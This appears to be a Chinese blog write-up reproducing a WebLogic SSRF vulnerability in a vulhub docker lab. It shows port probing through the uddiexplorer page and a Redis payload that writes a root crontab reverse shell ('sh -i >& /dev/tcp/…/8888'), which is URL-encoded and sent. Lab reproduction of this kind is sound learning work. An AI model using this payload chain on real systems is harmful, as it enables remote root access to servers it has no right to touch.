WebLogic SSRF 漏洞复现(Radies 反弹)

WebLogic SSRF 漏洞复现

环境搭建

vim docker-compose.yml
version: '2'
services:
 weblogic:
   image: vulhub/weblogic:10.3.6.0-2017
   depends_on:
    - redis
   ports:
    - "7001:7001"
 redis:
   image: vulhub/baselinux:centos-6
sudo docker-compose up -d

漏洞复现

端口探测

image-20231118164223415

搭建成功后访问

kali的ip:7001/uddiexplorer/SearchPublicRegistries.jsp

漏洞点存在于此网页

image-20231118164526747

点击 serach,抓包

image-20231118165853663

更改请求的 url,查看回显

image-20231118171447416

访问开启的端口报错

如果访问的非http协议,则会返回did not have a valid SOAP content-type

image-20231118171946014

访问关闭的端口报错

image-20231118172030997

Radies 反弹 shell

查看 Radies ip,Radies 数据库默认端口为 6379

sudo docker ps -a
sudo docker exec -it d250fa8fcafa ip addr

image-20231118173451492

访问该端口,报错信息表示端口开启

image-20231118173922351

编写反弹 shell 脚本

set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/10.9.47.101/8888 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

image-20231118181000788

url 编码,发送

image-20231118181050203

kali 开启监听

image-20231118175941588

image-20231118181213847

成功反弹

image-20231118181241390

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值